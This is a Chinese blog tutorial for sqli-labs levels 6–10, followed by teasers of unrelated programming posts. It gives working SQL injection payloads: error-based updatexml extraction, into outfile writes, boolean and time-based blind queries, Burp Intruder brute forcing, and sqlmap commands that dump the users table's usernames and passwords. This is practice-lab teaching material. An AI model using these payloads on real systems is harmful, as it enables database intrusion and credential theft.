当前位置：首页 > news >正文

sqli-labs(6-10)关通关讲解

news 2026/2/8 14:51:30

sqli-labs(6-10)关通关讲解

Less-6

方法一：手工注入

1.判断闭合

http://localhost/sqli-labs/Less-6/?id=1" //报错
http://localhost/sqli-labs/Less-6/?id=1" --+  //正常
http://localhost/sqli-labs/Less-6/?id=1" and 1=1 --+
http://localhost/sqli-labs/Less-6/?id=1" and 1=2 --+

2.因为页面没有回显点而且语句错误会报错，所以我们用报错注入

先查数据库名

http://localhost/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,database()),3)--+

3.再查表名

http://localhost/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")),3)--+

4.查users表中字段名

http://localhost/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")),3)--+

5.查username,password字段的数据

http://localhost/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,password) from users)),3)--+

这里发现数据并不全，若想查到后面的数据可用限制查询：

http://localhost/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 4,1)),3)--+
#limt 4,1 从4开始查询一位，通过修改起始位置来分别查每行数据

方法二：工具注入

使用sqlmap.py

1.查看所有数据库和当前数据库

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-6/?id=1" --dbs --batch

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-6/?id=1"  --batch --current-db

2.查看security库中表

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-6/?id=1"  --batch -D security --tables

3.c

3.查看users表中数据

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-6/?id=1"  --batch -D security -T users --dump

Less-7

看下题目是用into outfile

1.判断闭合

先尝试'发现页面显示

"页面显示

所以以**'**为主继续尝试闭合

http://localhost/sqli-labs/Less-7/?id=1')  and 1=1--+ //报错
http://localhost/sqli-labs/Less-7/?id=1'))  and 1=1--+ //正常
http://localhost/sqli-labs/Less-7/?id=1'))  and 1=2--+ //报错

所以闭合方式为 ')) --+

2.判断字段数

http://127.0.0.1/sqli-labs/Less-7/?id=1')) order by 3--+ //正常
http://127.0.0.1/sqli-labs/Less-7/?id=1')) order by 4--+ //报错

3.查表

http://127.0.0.1/sqli-labs/Less-7/?id=1')) union select 1,2,database() into outfile   'D:/download/database.txt' --+

4.查表

http://127.0.0.1/sqli-labs/Less-7/?id=1')) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="security") into outfile 'D:/download/table.txt' --+

5.查users的列

http://127.0.0.1/sqli-labs/Less-7/?id=1')) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users") into outfile 'D:/download/column.txt' --+

6.users查数据

http://127.0.0.1/sqli-labs/Less-7/?id=1')) union select 1,2,(select group_concat(id,username,password) from users) into outfile 'D:/download/dump.txt' --+

Less-8

题目是布尔注入-单引号

1.判断闭合

http://localhost/sqli-labs/Less-8/?id=1' and 1=1 --+
http://localhost/sqli-labs/Less-8/?id=1' and 1=2 --+

2.可以看出既没有回显点也没有报错，可通过布尔注入方式进行注入

方法一：

先去猜数据库长度

# 数据库长度判断
1：判断当前数据库的长度，利用二分法
?id=1' and length(database())>5--+   //正常显示
?id=1' and length(database())>8--+   //异常显示
?id=1' and length(database())=8--+   //正常显示
所以可知当前数据库长度为8个字符

知道数据库长度之后，我们可以利用ascii() substr() 函数对数据库名进行截取判断
ascii码是多少，最终得到数据库名"ascii(substr(database(),1,1)) 
ps:substr()截取位置默认从1开始# 数据库名称判断
2：判断当前数据库的字符,和上面的方法一样，利用二分法依次判断
判断数据库的第一个字符
?id=1' and ascii(substr(database(),1,1))>114--+
?id=1' and ascii(substr(database(),1,1))>116--+
?id=1' and ascii(substr(database(),1,1))=115--+   //ascii码值115对应的字母为s
然后依次判断每个字符，数据库长度为8最后可以判断出当前数据库为 security

数据库表名、字段名、表数据都可按此方法依次执行

也可以使用BP对其ASCII码进行爆破…

抓取以下数据包并将其发送到Intruder模块下，将截取字符串位置与ASCII码添加攻击向量，并设置攻击模式为集束炸弹(Cluster bomb);进入Payload标签下设置攻击内容如下并开启爆破攻击…

Payload1有效载荷给定截取位置，Payload2有效载荷给定ascii范围

From：字符串截取起始位置，To:字符串截取结束位置

按长度排序找到只有8个一样长度的数据，将ASCII码值转换成字母然后从1到8排序，最后得到 security就是数据库名

查表名

第一步：获取数据库下表的个数

# 判断当前数据库中表的个数
//判断当前数据库中的表的个数是否大于5，用二分法依次判断，最后得知当前数据库表
的个数为4
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())>3--+
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())>4--+
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4--+

第二步：分别注入出各个表名得长度。

第一个表：
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6--+
第二个表
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=8--+
第三个表
...

第三步：猜测表名每个字符的ASCII值

抓取以下数据包并将其发送到Intruder模块下，将截取字符串位置与ASCII码添加攻击向量，并设置攻击模式为集束炸弹(Cluster bomb)

?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a'--+

第一个表：6个字段

通过排序查出第一个表为：emails

第二个表：长度为8

第二个表为：referers

其他表依次判断

由此可判断出存在表 emails、referers、uagents、users ，猜测users表中最有可能存在账户和密码，所以以下判断字段和数据在 users 表中判断

爆破users字段名

第一步：判断字段数量

?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users" limit 0,1)=3--+  //3个字段

第二步：判断users各字段长度

?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1))=2--+
?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1))=8--+
?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1))=8--+

第三步：判断每个字段的字符—BP抓包爆破

#判断语句是否之前
?id=1' and substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1),1,1)>'a'--+
#随便等于一个字母然后抓包爆破
?id=1' and substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1),1,1)='a'--+

第一个字段

所以为id

第二个第三个，修改limit从哪开始

或者把limit 0，1中 0也设置成Payload1也可查出就是比较乱得找。

最终结果为：username，password

爆破字段下的内容

第一步：获取字段下内容得数量
?id=1' and (select count(username) from users limit 0,1)=12 --+
获取字段第内容长度
# 猜解字段中数据的长度
//依次判断所有数据
?id=1' and length((select id from users limit 0,1))>5--+
?id=1' and length((select username from users limit 0,1))>3 --+
?id=1' and length((select password from users limit 0,1))>3 --+
#获取第一个字段内容
#猜解字段数据的每个字符ASCII编码的出字符或者直接=字符判断字符
?id=1'and (ascii(substr((select username from users limit 0,1),1,1)))=68--+
?id=1'and (ascii(substr((select password from users limit 0,1),1,1)))=68--+然后通过Burp爆破获取

小结：一般布尔盲注，手工注入过于繁琐；不建议手注可借助工具如 SQLMAP…

方法二：工具注入

布尔盲注手工注入太过麻烦，最好借助工具sqlmap来注入

方法跟Less-6相同，这里我直接写出最后一步

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-8/?id=1" --batch -D security -T users --dump

推荐使用工具注入

Less-9

题目提示用时间盲注

1.判断闭合

之前判断方法都无法判断闭合但是可以用sleep()判断
http://127.0.0.1/sqli-labs/Less-9/?id=1' and sleep(5) --+

看见网页延时5s加载完那么闭合成功

2.判断数据库长度

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(length(database())=8,sleep(5),1) --+

3.判断数据库字段

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>90,sleep(5),1) --+
http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) 
//依次判断每一个

4.其他也是这样判断，太累了，这里就不赘述了。其实跟Less-8差不多，非常类似，都是靠猜。

Less-10

跟Less-9一样，就是闭合不同

http://127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(5)--+

sqli-labs(6-10)关通关讲解

sqli-labs(6-10)关通关讲解 Less-6 方法一：手工注入 1.判断闭合 http://localhost/sqli-labs/Less-6/?id1" //报错 http://localhost/sqli-labs/Less-6/?id1" -- //正常 http://localhost/sqli-labs/Less-6/?id1" and 11 -- http://localhos…...

编程日记 2024/7/31 13:01:53

【解决方法】git clone出现 curl 56 OpenSSL SSL_read: Connection was reset, errno 10054

当我们克隆别人的项目出现以下提示信息时候 remote: Enumerating objects: 7095, done. error: RPC failed; curl 56 OpenSSL SSL_read: Connection was reset, errno 10054 error: 2292 bytes of body are still expected fetch-pack: unexpected disconnect while reading s…...

编程日记 2024/7/31 13:00:52

机械拆装-基于Unity-本地数据持久化

目录 1. 数据结构简介：数据的集合 1.1 线性数据结构 1.2 非线性数据结构 2. 对数据集合的操作： 3. 数据持久化 3.1 数据的序列化存储 3.2 JSON文件硬盘存储 3.2.1 Json文件允许存储的数据类型 3.2.2 Json文件的语法格式 3.2.3 Json文件的读取 3.2.4 …...

编程日记 2024/7/31 12:59:51

【SpringBoot】4.3.5 参数传递之ModelAndView对象

ModelAndView也是SpringMVC中常用的数据返回对象。当控制器处理完请求时，通常会将包含视图对象和数据的ModelAndView对象一起返回前台。它的作用类似request对象的setAttribute()方法。 ModelAndView对象有两个作用: 1)设置转向地址(这也是ModelAndView和ModelMap的…...

编程日记 2024/7/31 12:58:49

《技术人求职之道》之简历优化篇（上）：量身打造简历，如何与自身情况完美匹配

摘要在求职过程中，简历优化是提升面试机会的关键步骤。本文将探讨如何通过精心设计简历来提高求职成功率。文章将首先指出，不存在完美简历，重要的是根据个人实际情况定制简历。接着，详细介绍撰写简历时应遵循的基本原则和要素&a…...

编程日记 2024/7/31 12:57:48

mysql+php+html实现学生管理系统

mysqlphphtml实现学生管理系统前言本文使用Mysqlphphtml实现一个简单的学生管理系统，实现了登陆，注册，总览学生信息，添加学生，查询特定的学生，删除指定的学生等功能。并且本文仅用来学习就够了&#xf…...

编程日记 2024/7/31 12:56:47

find+rm一行命令删除文件夹及子文件夹下文件，不删除子文件夹，或者用python实现

如果你正在使用类Unix操作系统（如Linux或macOS），并希望使用命令行工具rm来删除一个文件夹及其子文件夹下的所有文件，同时保留文件夹结构，你可以使用find命令配合rm来实现这一操作。这种方法非常高效且常用于批量删除文…...

编程日记 2024/7/31 12:55:46

超详细的linux-conda环境安装教程

安装和配置Linux系统中的Conda环境是一个强大的工具，它可以帮助用户管理Python及其库。以下是一份超详细的Linux-Conda环境安装教程： 1. 安装前的准备确保你的Linux系统已经更新到最新版本，并安装了基本的开发工具和库。 sudo apt-get up…...

编程日记 2024/7/31 12:53:43

vite项目构建配置

1、用vite搭建项目使用npm create vitelatest构建项目，配置项选项react->tsSWC即可。让后打开项目npm i。 2、项目配置 2.1、vite配置主要是配置用到的插件（plugins--比如：svg、mock等）、路径、环境变量的使用、打包、…...

编程日记 2024/7/31 12:52:42

Java 反射机制与Spring框架的那点事

Java 反射机制是 Java 语言提供的一种能力，允许程序在运行时查询、访问和修改它自己的结构和行为。反射机制非常有用，但同时也需要谨慎使用，因为它可能会带来性能开销和安全风险。以下是 Java 反射机制的一些关键概念和用法： Cl…...

编程日记 2024/7/31 12:51:41

计算机网络面试题3

四次挥手断开连接需要四次挥手 1.客户端发送一个FIN(SEQx）标志的数据包到服务端，用来关闭客户端到服务端的数据传送， 然后客户端进入FIN-WAIT-1状态。 2.服务端收到一个FIN(SEQx）标志的数据包，它…...

编程日记 2024/7/31 12:48:39

day54|110.字符串接龙, 105.有向图的完全可达性, 106.岛屿的周长

110.字符串接龙 110. 字符串接龙 (kamacoder.com) #include<iostream> #include<vector> #include<unordered_set> #include<unordered_map> #include<string> #include<queue>using namespace std;int main(){int n 0;cin >> n;…...

编程日记 2024/7/31 12:47:38

使用docker在CentOS 7上安装php+mysql+nginx环境教程并运行WordPress

文章目录一、安装docker1、切换yum源并更新系统2、卸载旧版docker3、配置Docker的yum库4、安装Docker5、启动和校验Docker6、配置镜像加速6.1、注册阿里云账号6.2、开通镜像服务6.3、配置镜像加速二、部署php+mysql+nginx环境1、准备目录结构2、拉取镜像3、运行容器并从中拷贝…...

编程日记 2024/7/31 12:42:34

vite tsx项目的element plus集成 - 按需引入踩坑

前面我们进行了开源组件的自研，很多组件可直接用现成的开源组件库，并不需要自己重复造轮子，为此我们讲如何在当前vite vitepress tsx技术整合的项目中实现element plus组件的按需引入，同时解决遇到的一些坑。安装Element Plus…...

编程日记 2024/7/31 12:38:30

Android GreenDao 升级保留旧表数据

Android GreenDao 升级保留旧表数据大川的川关注IP属地: 北京 0.2052019.08.05 11:54:36字数 270阅读 363 瓦力和伊娃 GreenDao升级库版本号之后，以前的旧数据没有了，为啥，因为GreenDao在升级的时候会删除旧库，创建新库&#…...

编程日记 2024/7/31 12:37:29

记一次证书站有趣的SQL注入

一、确定站点按照以前文章中提到的寻找可进站测试的思路，找到了某证书站的一处站点，通告栏中写明了初始密码的结构，因此我们可通过信息搜集进入该站点(可以考虑去搜集比较老的学号，因为这样的账号要么被冻结，要么就是…...

编程日记 2024/7/31 12:33:25

1_初识pytorch

之前完全没有了解过深度学习和pytorch，但现在因为某些原因不得不学了。不得不感叹，深度学习是真的火啊。纯小白，有错的欢迎指正~ 参考视频：PyTorch深度学习快速入门教程（绝对通俗易懂！）【小土堆…...

编程日记 2024/7/31 12:32:24

c++typeid()的使用

用处: typeid()函数主要用来获取对应类型或者变量的类型信息，其返回一个std::type_info的对象，这个对象中存放了对应类型的具体信息。所以typeid()函数就是获取一个type_info的类型，然后可以通过此类型来获取到相应的类型信息。 type_info的…...

编程日记 2024/7/31 12:31:21

【面向就业的Linux基础】从入门到熟练，探索Linux的秘密（十四）-租云服务器及配环境、docker基本命令

主要介绍了租云服务器和docker配置、基本命令！！！ 文章目录前言一、云平台二、租云服务器及安装docker 1.阿里云 2.安装docker 三、docker命令将当前用户添加到docker用户组镜像（images） 容器(container) 四、实战…...

编程日记 2024/7/31 12:27:17

实现一个全栈模糊搜索匹配的功能

提供一个全栈实现的方案，包括 Vue 3 前端、Express 后端和 MySQL 数据库的分类模糊搜索功能。让我们逐步来看： 1. 数据库设计 (MySQL) 首先，我们需要一个存储分类的表： CREATE TABLE categories (id INT AUTO_INCREMENT PRIMAR…...

编程日记 2024/7/31 12:26:16

uniapp 对接腾讯云IM群组成员管理（增删改查）

UniApp 实战：腾讯云IM群组成员管理（增删改查） 一、前言在社交类App开发中，群组成员管理是核心功能之一。本文将基于UniApp框架，结合腾讯云IM SDK，详细讲解如何实现群组成员的增删改查全流程。权限校验…...

编程新知 2026/1/13 9:59:27

微信小程序之bind和catch

这两个呢，都是绑定事件用的，具体使用有些小区别。官方文档： 事件冒泡处理不同 bind：绑定的事件会向上冒泡，即触发当前组件的事件后，还会继续触发父组件的相同事件。例如，有一个子视图绑定了b…...

编程新知 2026/2/5 5:05:56

【单片机期末】单片机系统设计

主要内容：系统状态机，系统时基，系统需求分析，系统构建，系统状态流图一、题目要求二、绘制系统状态流图题目：根据上述描述绘制系统状态流图，注明状态转移条件及方向。三、利用定时器产生时…...

编程新知 2026/1/31 12:27:36

Psychopy音频的使用

Psychopy音频的使用本文主要解决以下问题： 指定音频引擎与设备；播放音频文件本文所使用的环境： Python3.10 numpy2.2.6 psychopy2025.1.1 psychtoolbox3.0.19.14 一、音频配置 Psychopy文档链接为Sound - for audio playback — Psy…...

编程新知 2026/1/31 15:09:31

鸿蒙中用HarmonyOS SDK应用服务 HarmonyOS5开发一个生活电费的缴纳和查询小程序

一、项目初始化与配置 1. 创建项目 ohpm init harmony/utility-payment-app 2. 配置权限 // module.json5 {"requestPermissions": [{"name": "ohos.permission.INTERNET"},{"name": "ohos.permission.GET_NETWORK_INFO"…...

编程新知 2025/11/26 13:15:57